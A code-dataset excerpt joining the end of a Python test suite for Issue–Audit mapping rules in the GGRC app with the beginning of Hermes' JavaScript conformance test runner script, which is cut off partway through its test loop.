self.issue_audit_mapping = factories.RelationshipFactory(
source=self.audit,
destination=self.issue_mapped,
context=self.audit.context,
)
def test_map_to_audit(self):
"""Issue can be mapped to an Audit."""
response, _ = self.generator.generate_relationship(
source=self.audit,
destination=self.issue_unmapped,
context=self.audit.context,
)
self.assertStatus(response, 201)
def test_unmap_from_audit(self):
"""Issue can be unmapped from an Audit."""
response = self.generator.api.delete(self.issue_audit_mapping)
self.assert200(response)
def test_populate_audit_and_context(self):
"""Issue mapped to Audit -> Issue audit_id and context_id are set."""
response, _ = self.generator.generate_relationship(
source=self.audit,
destination=self.issue_unmapped,
context=self.audit.context,
)
self.assertStatus(response, 201)
self.issue_unmapped = self.refresh_object(self.issue_unmapped)
self.assertEqual(self.issue_unmapped.audit_id, self.audit.id)
self.assertEqual(self.issue_unmapped.context_id, self.audit.context_id)
def test_unpopulate_audit_and_context(self):
"""Issue unmapped from Audit -> Issue audit_id and context_id are unset."""
# workaround to make sure the id is fetched from the db
id_ = self.issue_mapped.id
self.generator.api.delete(self.issue_audit_mapping)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=id_)
self.assertIs(self.issue_mapped.audit_id, None)
self.assertIs(self.issue_mapped.context_id, None)
def test_post_issue_with_audit_set(self):
"""Issue isn't mapped to Audit by POSTing with audit field."""
response, issue = self.generator.generate_object(
all_models.Issue,
{"audit": {"type": "Audit", "id": self.audit.id}},
)
self.assertStatus(response, 201)
rel = all_models.Relationship
source_tuple = rel.source_type, rel.source_id
destination_tuple = rel.destination_type, rel.destination_id
audit_tuple = "Audit", self.audit.id
issue_tuple = "Issue", issue.id
self.assertEqual(rel.query.filter(
source_tuple == audit_tuple and destination_tuple == issue_tuple or
destination_tuple == audit_tuple and source_tuple == issue_tuple
).count(), 0)
def test_deny_mapping_to_two_audits(self):
"""Issue can't be mapped to two Audits at once."""
issue_stub = self.generator.create_stub(self.issue_unmapped)
audit_stubs = [self.generator.create_stub(a) for a in self.other_audits]
response, _ = self.generator.generate_relationship(
source=self.other_audits[0],
destination=self.issue_mapped,
context=self.other_audits[0].context,
)
self.assert400(response)
response = self.generator.api.post(
all_models.Relationship,
[{"source": issue_stub,
"destination": audit_stubs[0],
"context": None},
{"source": issue_stub,
"destination": audit_stubs[1],
"context": None}],
)
self.assert400(response)
def test_deny_unmapping_from_audit_asmt(self):
"""Issue can't be unmapped from Audit if has common Assessment."""
with factories.single_commit():
assessment = factories.AssessmentFactory(audit=self.audit)
factories.RelationshipFactory(source=assessment, destination=self.audit,
context=self.audit.context)
factories.RelationshipFactory(source=assessment,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.issue_audit_mapping)
self.assert400(response)
def test_deny_unmapping_from_audit_snapshot(self):
"""Issue can't be unmapped from Audit if has common Snapshot."""
factories.RelationshipFactory(source=self.snapshot,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.issue_audit_mapping)
self.assert400(response)
def test_delete_audit_with_issue(self):
"""Audit can be deleted if mapped to Issue, Issue is unmapped."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
response = self.generator.api.delete(self.audit)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.audit)
self.assertIsNotNone(self.issue_mapped)
self.assertIsNone(self.issue_mapped.context_id)
self.assertIsNone(self.issue_mapped.audit_id)
def test_delete_issue_with_audit(self):
"""Issue can be deleted if mapped to Audit."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
response = self.generator.api.delete(self.issue_mapped)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.issue_mapped)
self.assertIsNotNone(self.audit)
def test_delete_issue_with_audit_and_snapshot(self):
"""Issue can be deleted if mapped to Audit and Snapshot."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
factories.RelationshipFactory(source=self.snapshot,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.issue_mapped)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.issue_mapped)
self.assertIsNotNone(self.audit)
def test_delete_audit_with_issue_and_snapshot(self):
"""Audit can be deleted if mapped to Issue mapped to Snapshot."""
issue_id = self.issue_mapped.id
audit_id = self.audit.id
factories.RelationshipFactory(source=self.snapshot,
destination=self.issue_mapped,
context=self.audit.context)
response = self.generator.api.delete(self.audit)
self.issue_mapped = self.refresh_object(self.issue_mapped, id_=issue_id)
self.audit = self.refresh_object(self.audit, id_=audit_id)
self.assert200(response)
self.assertIsNone(self.audit)
self.assertIsNotNone(self.issue_mapped)
self.assertIsNone(self.issue_mapped.context_id)
self.assertIsNone(self.issue_mapped.audit_id)
class TestIssueUnmap(TestCase):
"""Test suite to check the rules for Issue-Audit mappings."""
def setUp(self):
"""Setup tests data"""
super(TestIssueUnmap, self).setUp()
self.generator = generator.ObjectGenerator(fail_no_json=False)
# TODO: replace this hack with a special test util
from ggrc.login import noop
noop.login() # this is needed to pass the permission checks in automapper
with factories.single_commit():
audit = factories.AuditFactory()
self.audit_id = audit.id
assessments = [
factories.AssessmentFactory(audit=audit) for _ in range(2)
]
controls = [factories.ControlFactory() for _ in range(2)]
snapshots = self._create_snapshots(audit, controls)
self.snapshot_ids = [s.id for s in snapshots]
issue = factories.IssueFactory()
self.issue_id = issue.id
factories.RelationshipFactory(source=audit, destination=assessments[0])
factories.RelationshipFactory(source=audit, destination=assessments[1])
factories.RelationshipFactory(
source=assessments[0], destination=snapshots[0]
)
factories.RelationshipFactory(
source=assessments[0], destination=snapshots[1]
)
factories.RelationshipFactory(
source=assessments[1], destination=snapshots[1]
)
self.unmap_rel_id1 = factories.RelationshipFactory(
source=issue, destination=assessments[0]
).id
self.unmap_rel_id2 = factories.RelationshipFactory(
source=issue, destination=assessments[1]
).id
def get_relationships(self, obj1_id, obj1_type, obj2_id, obj2_type):
"""Get relationships between objects"""
# pylint: disable=no-self-use
return db.session.query(all_models.Relationship.id).filter_by(
source_type=obj1_type,
source_id=obj1_id,
destination_type=obj2_type,
destination_id=obj2_id,
).union(
db.session.query(all_models.Relationship.id).filter_by(
source_type=obj2_type,
source_id=obj2_id,
destination_type=obj1_type,
destination_id=obj1_id,
)
)
def test_issue_cascade_unmap(self):
"""Test cascade unmapping Issue from Assessment"""
unmap_rel1 = all_models.Relationship.query.get(self.unmap_rel_id1)
response = self.generator.api.delete(unmap_rel1, {"cascade": "true"})
self.assert200(response)
snap0_issue_rel = self.get_relationships(
self.snapshot_ids[0], "Snapshot", self.issue_id, "Issue"
)
self.assertEqual(snap0_issue_rel.count(), 0)
self.assertEqual(
all_models.Relationship.query.filter_by(id=self.unmap_rel_id1).count(),
0
)
self.assertEqual(all_models.Relationship.query.count(), 8)
unmap_rel2 = all_models.Relationship.query.get(self.unmap_rel_id2)
response = self.generator.api.delete(unmap_rel2, {"cascade": "true"})
self.assert200(response)
issue = all_models.Issue.query.get(self.issue_id)
snap1_issue_rel = self.get_relationships(
self.snapshot_ids[1], "Snapshot", self.issue_id, "Issue"
)
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
self.assertEqual(snap1_issue_rel.count(), 0)
self.assertEqual(audit_issue_rel.count(), 0)
self.assertIsNone(issue.audit_id)
self.assertIsNone(issue.context_id)
self.assertEqual(
all_models.Relationship.query.filter_by(id=self.unmap_rel_id2).count(),
0
)
self.assertEqual(all_models.Relationship.query.count(), 5)
def test_cascade_unmap_automapped(self):
"""Test if cascade unmapping Issue will not work for automapped"""
# Set all Relationships as manually created
db.session.query(all_models.Relationship).update({"automapping_id": None})
db.session.commit()
unmap_rel1 = all_models.Relationship.query.get(self.unmap_rel_id1)
response = self.generator.api.delete(unmap_rel1, {"cascade": "true"})
self.assert200(response)
unmap_rel2 = all_models.Relationship.query.get(self.unmap_rel_id2)
response = self.generator.api.delete(unmap_rel2, {"cascade": "true"})
self.assert200(response)
# No Issue-Snapshot, no Issue-Audit relationships should be removed
# as they manually mapped
snap0_issue_rel = self.get_relationships(
self.snapshot_ids[0], "Snapshot", self.issue_id, "Issue"
)
self.assertEqual(snap0_issue_rel.count(), 1)
snap1_issue_rel = self.get_relationships(
self.snapshot_ids[1], "Snapshot", self.issue_id, "Issue"
)
self.assertEqual(snap1_issue_rel.count(), 1)
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
self.assertEqual(audit_issue_rel.count(), 1)
def test_cascade_unmap_man_audit(self):
"""Test cascade unmapping Issue from Audit if it manually mapped"""
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
all_models.Relationship.query.filter(
all_models.Relationship.id.in_(audit_issue_rel.subquery())
).update({"automapping_id": None}, synchronize_session="fetch")
db.session.commit()
unmap_rel1 = all_models.Relationship.query.get(self.unmap_rel_id1)
response = self.generator.api.delete(unmap_rel1, {"cascade": "true"})
self.assert200(response)
# Snapshot is unmapped in cascade as it's automapped
self.assertEqual(all_models.Relationship.query.count(), 8)
unmap_rel2 = all_models.Relationship.query.get(self.unmap_rel_id2)
response = self.generator.api.delete(unmap_rel2, {"cascade": "true"})
self.assert200(response)
snap1_issue_rel = self.get_relationships(
self.snapshot_ids[1], "Snapshot", self.issue_id, "Issue"
)
audit_issue_rel = self.get_relationships(
self.audit_id, "Audit", self.issue_id, "Issue"
)
self.assertEqual(snap1_issue_rel.count(), 0)
# Audit is not removed in cascade as it was manually created
self.assertEqual(audit_issue_rel.count(), 1)
self.assertEqual(
all_models.Relationship.query.filter_by(id=self.unmap_rel_id2).count(),
0
)
self.assertEqual(all_models.Relationship.query.count(), 6)
| 38.034483
| 79
| 0.681647
|
fedac9faf25e949d83a034c051f6a26f524ea8e0
| 36,613
|
py
|
Python
|
utils/testsuite/testsuite.py
|
Shanu1515/hermes
|
a6260f2aba22656117202da53d11fa5cc17fe690
|
[
"MIT"
] | 1
|
2021-05-12T13:38:27.000Z
|
2021-05-12T13:38:27.000Z
|
utils/testsuite/testsuite.py
|
Shanu1515/hermes
|
a6260f2aba22656117202da53d11fa5cc17fe690
|
[
"MIT"
] | 6
|
2021-03-01T21:22:38.000Z
|
2022-02-26T02:00:00.000Z
|
utils/testsuite/testsuite.py
|
Shanu1515/hermes
|
a6260f2aba22656117202da53d11fa5cc17fe690
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import enum
import os
import re
import subprocess
import sys
import tempfile
import textwrap
import time
from collections import namedtuple
from multiprocessing import Pool, Value
from os.path import basename, isdir, isfile, join, splitext
try:
from testsuite.testsuite_skiplist import (
SKIP_LIST,
PERMANENT_SKIP_LIST,
UNSUPPORTED_FEATURES,
PERMANENT_UNSUPPORTED_FEATURES,
)
import testsuite.esprima_test_runner as esprima
except ImportError:
# Hacky way to handle non-buck builds that call the file immediately.
from testsuite_skiplist import (
SKIP_LIST,
PERMANENT_SKIP_LIST,
UNSUPPORTED_FEATURES,
PERMANENT_UNSUPPORTED_FEATURES,
)
import esprima_test_runner as esprima
## This is a simple script that runs the hermes compiler on
## external test suites. The script expects to find the hermes compiler under
## ./bin/hermes. The script adds
## some basic test built-ins such as assertTrue, assertEquals that are used in
## the V8 test suite.
## How results are computed:
## If a test is on the skip list or contains unsupported ES6 features,
## it is skipped, and thus not executed at all.
## Result classes:
## Compile fail: The Hermes compiler failed when it should have succeeded,
## or vice versa.
## Compile timeout: The Hermes compiler timed out.
## Execute fail: Bytecode execution with the chosen backend
## failed when it should have succeeded, or vice versa.
## Execute timeout: Bytecode execution with the chosen backend timed out.
## Strictness:
## The default strictness mode is currently non-strict.
## For the test suites themselves:
## - test262: Require the test to pass in both strictness modes,
## generating source code for both modes automatically.
## - mjsunit: Run the tests in non-strict mode,
## because the test suite adds its own "use strict" directives.
## The content of this string is prepended to the test files and is used to
## provide the basic test built-ins.
test_builtins_content = """
// v8 test harness:
function internal_arraysEqual(a, b) {
if (a === b) return true;
if (a.length != b.length) return false;
for (var i = 0; i < a.length; ++i) { if (a[i] !== b[i]) return false; }
return true;
}
function builtin_nop(x) { return x; }
function builtin_false() { return false; }
var nopSentinel = {};
function v8pragma_HaveSameMap(obj1, obj2) {
// This function doesn't work for all tests, but works for many.
var keysAreSubset = function(lhs, rhs) {
for (var property in lhs) {
if (lhs[property] !== rhs[property]) {
return false;
}
}
return true;
}
return keysAreSubset(obj1, obj2) && keysAreSubset(obj2, obj1);
}
function v8pragma_FunctionSetPrototype(f, p) {
// Set f.prototype.
f.prototype = p;
}
function v8pragma_ClassOf(obj) {
// Turn "[object ClassName]" into just "ClassName".
return Object.prototype.toString.call(obj).slice(8, -1);
}
function v8pragma_Call(f, thisVal) {
return f.apply(thisVal, Array.prototype.slice.call(arguments, 2));
}
function v8pragma_StringCharFromCode(i) {
return String.fromCharCode(i);
}
function v8pragma_StringCharCodeAt(s, i) {
return s.charCodeAt(i);
}
// debug variable sometimes used in mjsunit.
// Implemented the same way JSC does.
var debug = function(s) {
print('-->', s);
};
// The idea here is that some pragmas are meaningless for our JS interpreter,
// but we don't want to throw out the whole test case. In those cases, just
// throw out the assertions in those test cases resulting from checking the
// results of those pragmas.
function v8pragma_NopSentinel() {
return nopSentinel;
}
// test262 requirements.
// Leave the unimplemented features unset in $262.
var $262 = {};
$262.global = this;
$262.evalScript = eval;
if (typeof HermesInternal === 'object') {
$262.detachArrayBuffer = HermesInternal.detachArrayBuffer;
}
// Browser functions:
var alert = print;
"""
# Colors for stdout.
@enum.unique
class Color(enum.Enum):
RESET = enum.auto()
RED = enum.auto()
GREEN = enum.auto()
def __str__(self):
if not sys.stdout.isatty():
return ""
return {
Color.RESET.value: "\033[0m",
Color.RED.value: "\033[31m",
Color.GREEN.value: "\033[32m",
}[self.value]
# These flags indicate the status of a job.
@enum.unique
class TestFlag(enum.Enum):
TEST_FAILED = enum.auto()
TEST_PASSED = enum.auto()
TEST_SKIPPED = enum.auto()
TEST_PERMANENTLY_SKIPPED = enum.auto()
TEST_UNEXPECTED_PASSED = enum.auto()
COMPILE_FAILED = enum.auto()
COMPILE_TIMEOUT = enum.auto()
EXECUTE_FAILED = enum.auto()
EXECUTE_TIMEOUT = enum.auto()
def __str__(self):
return {
TestFlag.TEST_FAILED.value: "TEST_FAILED",
TestFlag.TEST_PASSED.value: "TEST_PASSED",
TestFlag.TEST_SKIPPED.value: "TEST_SKIPPED",
TestFlag.TEST_PERMANENTLY_SKIPPED.value: "TEST_PERMANENTLY_SKIPPED",
TestFlag.TEST_UNEXPECTED_PASSED.value: "TEST_UNEXPECTED_PASSED",
TestFlag.COMPILE_FAILED.value: "COMPILE_FAILED",
TestFlag.COMPILE_TIMEOUT.value: "COMPILE_TIMEOUT",
TestFlag.EXECUTE_FAILED.value: "EXECUTE_FAILED",
TestFlag.EXECUTE_TIMEOUT.value: "EXECUTE_TIMEOUT",
}[self.value]
TIMEOUT_COMPILER = 200
TIMEOUT_VM = 200
includesMatcher = re.compile(r"includes:\s*\[(.*)\]")
# This matches a special case in which the includes looks like:
# includes:
# - foo.js
# This regex works only because the few cases which use this pattern
# only include one file.
specialIncludesMatcher = re.compile(
"includes:\n" r".*-\s*(.*\.js)" "\n", re.MULTILINE | re.DOTALL
)
def generateSource(content, strict, suite, flags):
"""
Generate the source code for a test case resulting from resolving pragmas in
the given file and adding a use-strict directive, if necessary.
Return a tuple: (source, includes)
"""
# The raw flag specifies that the source code shouldn't be modified.
if "raw" in flags:
return (content, [])
v8_pragmas = {
"%OptimizeObjectForAddingMultipleProperties": "builtin_nop",
"%ClearFunctionTypeFeedback": "builtin_nop",
"%OptimizeFunctionOnNextCall": "builtin_nop",
"%DeoptimizeFunction": "builtin_nop",
"%DeoptimizeNow": "builtin_nop",
"%_DeoptimizeNow": "builtin_nop",
"%NeverOptimizeFunction": "builtin_nop",
"%OptimizeOsr": "builtin_nop",
"%ClearFunctionTypeFeedback": "builtin_nop",
"%BaselineFunctionOnNextCall": "builtin_nop",
"%SetForceInlineFlag": "builtin_nop",
"%OptimizeObjectForAddingMultipleProperties": "builtin_nop",
"%ToFastProperties": "builtin_nop",
"%NormalizeElements": "builtin_nop",
"%ArrayBufferNeuter": "HermesInternal.detachArrayBuffer",
# ArrayBufferDetach is the more modern version of ArrayBufferNeuter.
"%ArrayBufferDetach": "HermesInternal.detachArrayBuffer",
"%RunMicrotasks": "builtin_nop",
"%SetAllocationTimeout": "builtin_nop",
"%UnblockConcurrentRecompilation": "builtin_nop",
"%DebugPrint": "builtin_nop",
"%HaveSameMap": "v8pragma_HaveSameMap",
"%HasFastDoubleElements": "v8pragma_NopSentinel",
"%HasFastSmiElements": "v8pragma_NopSentinel",
"%HasFastObjectElements": "v8pragma_NopSentinel",
"%HasFastHoleyElements": "v8pragma_NopSentinel",
"%HasFastProperties": "v8pragma_NopSentinel",
"%IsAsmWasmCode": "v8pragma_NopSentinel",
"%IsNotAsmWasmCode": "v8pragma_NopSentinel",
"%NotifyContextDisposed": "v8pragma_NopSentinel",
"%FunctionSetPrototype": "v8pragma_FunctionSetPrototype",
"%_ClassOf": "v8pragma_ClassOf",
"%_Call": "v8pragma_Call",
"%RunningInSimulator": "builtin_false",
"%IsConcurrentRecompilationSupported": "builtin_false",
"%_StringCharFromCode": "v8pragma_StringCharFromCode",
"%_StringCharCodeAt": "v8pragma_StringCharCodeAt",
}
for pragma, replacement in v8_pragmas.items():
content = content.replace(pragma, replacement)
source = ""
if strict:
source += "'use strict';\n"
includes = []
if suite:
if "test262" in suite:
match = includesMatcher.search(content)
includes = ["assert.js", "sta.js"]
if match:
includes += [i.strip() for i in match.group(1).split(",")]
match = specialIncludesMatcher.search(content)
if match:
includes.append(match.group(1))
for i in includes:
filepath = join(suite, "harness", i)
with open(filepath, "rb") as f:
source += f.read().decode("utf-8") + "\n"
if "mjsunit" in suite:
filepath = join(suite, "mjsunit.js")
with open(filepath, "rb") as f:
source += f.read().decode("utf-8") + "\n"
source += test_builtins_content
source += content
return (source, includes)
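# Illustrative sketch of how generateSource() is consumed (the test path and
# helper name below are hypothetical; nothing in the suite calls this):
def _example_generate_source(test_path="test262/test/sample.js"):
    # Assumes a test262 checkout relative to the working directory, so the
    # harness includes (assert.js, sta.js, ...) can be resolved.
    with open(test_path, "rb") as f:
        content = f.read().decode("utf-8")
    source, includes = generateSource(
        content, strict=True, suite=getSuite(test_path), flags=set()
    )
    return source, includes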
evalMatcher = re.compile(r"\beval\s*\(")
indirectEvalMatcher = re.compile(r"\(.*,\s*eval\)\s*\(")
assignEvalMatcher = re.compile(r"=\s*eval\s*;")
withMatcher = re.compile(r"\bwith\s*\(")
constMatcher = re.compile(r"\bconst\b")
negativeMatcher = re.compile(
r"""
/\*---.*
negative:.*\n
\s*phase:\s*(\S+).*\n
\s*type:\s*(\S+).*\n
---\*/
""",
re.MULTILINE | re.DOTALL | re.VERBOSE,
)
negativeMatcher2 = re.compile(
r"""
/\*---.*
negative:.*\n
\s*type:\s*(\S+).*\n
\s*phase:\s*(\S+).*\n
---\*/
""",
re.MULTILINE | re.DOTALL | re.VERBOSE,
)
flagsMatcher = re.compile(r"\s*flags:\s*\[(.*)\]")
featuresMatcher = re.compile(r"\s*features:\s*\[(.*)\]")
# Alternate features syntax has "features:" and then bullet points using "-".
featuresMatcher2 = re.compile(r"\s*features:\s*\n(.*)\*\/", re.MULTILINE | re.DOTALL)
def getSuite(filename):
suite = None
# Try all possible test suites to see which one we're in.
for s in ["test262", "mjsunit", "CVEs", "esprima"]:
if (s + "/") in filename:
suite = filename[: filename.find(s) + len(s)]
break
return suite
verbose = False
def printVerbose(s):
global verbose
if verbose:
print(s)
istty = sys.stdout.isatty()
completed = Value("i", 0)
ttyWidth = os.get_terminal_size().columns if istty else 0
def showStatus(filename):
global completed, istty, verbose, count
if istty and not verbose and count > 0:
with completed.get_lock():
record = ("\r{:" + str(ttyWidth) + "s}\n").format("Testing " + filename)
status = "{:06.2f}% ({:d} / {:d})".format(
100.0 * completed.value / count, completed.value, count
)
sys.stdout.write(record + status)
sys.stdout.flush()
completed.value += 1
else:
print("Testing " + filename)
es6_args = ["-Xes6-proxy", "-Xes6-symbol"]
extra_run_args = ["-Xhermes-internal-test-methods"]
extra_compile_flags = ["-fno-static-builtins"]
def fileInSkiplist(filename):
for blName in SKIP_LIST + PERMANENT_SKIP_LIST:
if isinstance(blName, str):
if blName in filename:
return True
else:
# Assume it's a regex if it's not a string.
if blName.search(filename):
return True
return False
def fileInPermanentSkiplist(filename):
for blName in PERMANENT_SKIP_LIST:
if blName in filename:
return True
return False
# should_run: bool, If the test should run
# skip_reason: str, Reason for skipping, if the test shouldn't be run.
# Empty if the test should be run (str)
# permanent: bool, If the test shouldn't be run, whether that condition is permanent
# flags: Set[str], The flags that were found for the file
# strict_modes: List[str], The strict modes that this file should be run with
TestContentParameters = namedtuple(
"TestContentFlags",
["should_run", "skip_reason", "permanent", "flags", "strict_modes"],
)
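# e.g. testShouldRun() below may return:
#   TestContentParameters(False, "Skipping test with eval()", True,
#                         {"onlyStrict"}, [True])
# (values taken from its return paths; shown only to make the field order
# concrete).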
def testShouldRun(filename, content):
suite = getSuite(filename)
# Determine flags and strict modes before deciding to skip a test case.
flags = set()
strictModes = []
if not suite:
strictModes = [False]
else:
if "test262" in suite:
match = flagsMatcher.search(content)
if match:
flags = {flag.strip() for flag in match.group(1).split(",")}
if "onlyStrict" in flags:
strictModes = [True]
elif "noStrict" in flags or "raw" in flags:
strictModes = [False]
else:
strictModes = [True, False]
else:
strictModes = [True, False]
elif "mjsunit" in suite:
strictModes = [False]
elif "CVEs" in suite:
strictModes = [False]
else:
raise Exception("Unknown suite")
# Now find if this test case should be skipped.
if "async" in flags:
# We don't support async operations.
return TestContentParameters(
False, "Skipping test with async", False, flags, strictModes
)
if "module" in flags:
# We don't support module code.
return TestContentParameters(
False, "Skipping test with modules", False, flags, strictModes
)
# Be picky about which tests to run unless we are running the CVEs suite
runAll = "CVEs" in suite
if not runAll:
# Skip tests that use 'eval'.
if evalMatcher.search(content):
return TestContentParameters(
False, "Skipping test with eval()", True, flags, strictModes
)
# Skip tests that use indirect 'eval' that look like (1, eval)(...).
if indirectEvalMatcher.search(content):
return TestContentParameters(
False, "Skipping test with indirect eval()", True, flags, strictModes
)
# Skip tests that use indirect 'eval' by assigning a variable to eval.
if assignEvalMatcher.search(content):
return TestContentParameters(
False, "Skipping test with alias to eval()", True, flags, strictModes
)
# Skip tests that use 'with'.
if withMatcher.search(content):
return TestContentParameters(
False, "Skipping test with with()", True, flags, strictModes
)
if constMatcher.search(content):
return TestContentParameters(
False, "Skipping test with 'const'", False, flags, strictModes
)
if suite and "test262" in suite:
# Skip unsupported features.
match = featuresMatcher.search(content)
match2 = featuresMatcher2.search(content)
features = set()
if match:
features.update(feature.strip() for feature in match.group(1).split(","))
if match2:
features.update(
feature.strip(" \t\n\r-") for feature in match2.group(1).split("\n")
)
features.discard("")
for f in features:
if f in UNSUPPORTED_FEATURES + PERMANENT_UNSUPPORTED_FEATURES:
return TestContentParameters(
False,
"Skipping unsupported feature: " + f,
f in PERMANENT_UNSUPPORTED_FEATURES,
flags,
strictModes,
)
return TestContentParameters(True, "", False, flags, strictModes)
ESPRIMA_TEST_STATUS_MAP = {
esprima.TestStatus.TEST_PASSED: TestFlag.TEST_PASSED,
esprima.TestStatus.TEST_FAILED: TestFlag.COMPILE_FAILED,
esprima.TestStatus.TEST_SKIPPED: TestFlag.TEST_SKIPPED,
esprima.TestStatus.TEST_TIMEOUT: TestFlag.COMPILE_TIMEOUT,
}
def runTest(filename, test_skiplist, keep_tmp, binary_path, hvm, esprima_runner):
"""
Runs a single js test pointed by filename
"""
baseFileName = basename(filename)
suite = getSuite(filename)
skiplisted = fileInSkiplist(filename)
skippedType = (
TestFlag.TEST_PERMANENTLY_SKIPPED
if fileInPermanentSkiplist(filename)
else TestFlag.TEST_SKIPPED
)
if skiplisted and not test_skiplist:
printVerbose(
"Skipping test in skiplist{}: {}".format(
" (permanently)"
if skippedType is TestFlag.TEST_PERMANENTLY_SKIPPED
else "",
filename,
)
)
return (skippedType, "", 0)
showStatus(filename)
if "esprima" in suite:
hermes_path = os.path.join(binary_path, "hermes")
test_res = esprima_runner.run_test(filename, hermes_path)
return (
ESPRIMA_TEST_STATUS_MAP[test_res[0]],
"" if test_res[0] == esprima.TestStatus.TEST_PASSED else test_res[1],
0,
)
content = open(filename, "rb").read().decode("utf-8")
shouldRun, skipReason, permanent, flags, strictModes = testShouldRun(
filename, content
)
if not shouldRun:
skippedType = (
TestFlag.TEST_SKIPPED
if not permanent
else TestFlag.TEST_PERMANENTLY_SKIPPED
)
if not test_skiplist:
printVerbose(
skipReason
+ "{}: ".format(" (permanently)" if permanent else "")
+ filename
)
return (skippedType, "", 0)
# Check if the test is expected to fail, and how.
negativePhase = ""
m = negativeMatcher.search(content)
if m:
negativePhase = m.group(1)
else:
m = negativeMatcher2.search(content)
if m:
negativePhase = m.group(2)
# Report the max duration of any successful run for the variants of a test.
# Unsuccessful runs are ignored for simplicity.
max_duration = 0
for strictEnabled in strictModes:
temp = tempfile.NamedTemporaryFile(
prefix=splitext(baseFileName)[0] + "-", suffix=".js", delete=False
)
source, includes = generateSource(content, strictEnabled, suite, flags)
source = source.encode("utf-8")
if "testIntl.js" in includes:
# No support for multiple Intl constructors in that file.
return (TestFlag.TEST_SKIPPED, "", 0)
temp.write(source)
temp.close()
printVerbose("\n==============")
printVerbose("Strict Mode: {}".format(str(strictEnabled)))
printVerbose("Temp js file name: " + temp.name)
errString = ""
binfile = tempfile.NamedTemporaryFile(
prefix=splitext(baseFileName)[0] + "-", suffix=".hbc", delete=False
)
binfile.close()
for optEnabled in (True, False):
printVerbose("\nRunning with Hermes...")
printVerbose("Optimization: {}".format(str(optEnabled)))
run_vm = True
start = time.time()
# Compile to bytecode with Hermes.
try:
printVerbose("Compiling: {} to {}".format(filename, binfile.name))
args = (
[
os.path.join(binary_path, "hermes"),
temp.name,
"-hermes-parser",
"-emit-binary",
"-out",
binfile.name,
]
+ es6_args
+ extra_compile_flags
)
if optEnabled:
args.append("-O")
else:
args.append("-O0")
if strictEnabled:
args.append("-strict")
else:
args.append("-non-strict")
subprocess.check_output(
args, timeout=TIMEOUT_COMPILER, stderr=subprocess.STDOUT
)
if negativePhase == "early" or negativePhase == "parse":
run_vm = False
printVerbose(
"FAIL: Compilation failure expected on {} with Hermes".format(
baseFileName
)
)
# If the test was in the skiplist, it was possible a
# compiler failure was expected. Else, it is unexpected and
# will return a failure.
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.COMPILE_FAILED, "", 0)
)
except subprocess.CalledProcessError as e:
run_vm = False
if negativePhase != "early" and negativePhase != "parse":
printVerbose(
"FAIL: Compilation failed on {} with Hermes".format(
baseFileName
)
)
errString = e.output.decode("utf-8").strip()
printVerbose(textwrap.indent(errString, "\t"))
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.COMPILE_FAILED, errString, 0)
)
printVerbose("PASS: Hermes correctly failed to compile")
except subprocess.TimeoutExpired:
printVerbose("FAIL: Compilation timed out on {}".format(baseFileName))
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.COMPILE_TIMEOUT, "", 0)
)
# If the compilation succeeded, run the bytecode with the specified VM.
if run_vm:
try:
printVerbose("Running with HBC VM: {}".format(filename))
# Run the hermes vm.
args = (
[os.path.join(binary_path, hvm), binfile.name]
+ es6_args
+ extra_run_args
)
env = {"LC_ALL": "en_US.UTF-8"}
if sys.platform == "linux":
env["ICU_DATA"] = binary_path
subprocess.check_output(
args, timeout=TIMEOUT_VM, stderr=subprocess.STDOUT, env=env
)
if negativePhase == "runtime":
printVerbose("FAIL: Expected execution to throw")
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.EXECUTE_FAILED, "", 0)
)
else:
printVerbose("PASS: Execution completed successfully")
except subprocess.CalledProcessError as e:
if negativePhase != "runtime":
printVerbose(
"FAIL: Execution of {} threw unexpected error".format(
filename
)
)
printVerbose("Return code: {}".format(e.returncode))
if e.output:
printVerbose("Output:")
errString = e.output.decode("utf-8").strip()
printVerbose(textwrap.indent(errString, "\t"))
else:
printVerbose("No output received from process")
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.EXECUTE_FAILED, errString, 0)
)
else:
printVerbose(
"PASS: Execution of binary threw an error as expected"
)
except subprocess.TimeoutExpired:
printVerbose("FAIL: Execution of binary timed out")
return (
(skippedType, "", 0)
if skiplisted
else (TestFlag.EXECUTE_TIMEOUT, "", 0)
)
max_duration = max(max_duration, time.time() - start)
if not keep_tmp:
os.unlink(temp.name)
os.unlink(binfile.name)
if skiplisted:
# If the test was skiplisted, but it passed successfully, consider that
# an error case.
printVerbose("FAIL: A skiplisted test completed successfully")
return (TestFlag.TEST_UNEXPECTED_PASSED, "", max_duration)
else:
printVerbose("PASS: Test completed successfully")
return (TestFlag.TEST_PASSED, "", max_duration)
def makeCalls(params, onlyfiles, rangeLeft, rangeRight):
global count
# Store all test parameters in calls[].
calls = []
count = -1
for f in onlyfiles:
count += 1
if count < rangeLeft or count > rangeRight:
continue
calls.append((f,) + params)
return calls
def calcParams(params):
return (params[0], runTest(*params))
def testLoop(calls, jobs, fail_fast, num_slowest_tests):
results = []
# Histogram for results from the Hermes compiler.
resultsHist = {
TestFlag.COMPILE_FAILED: 0,
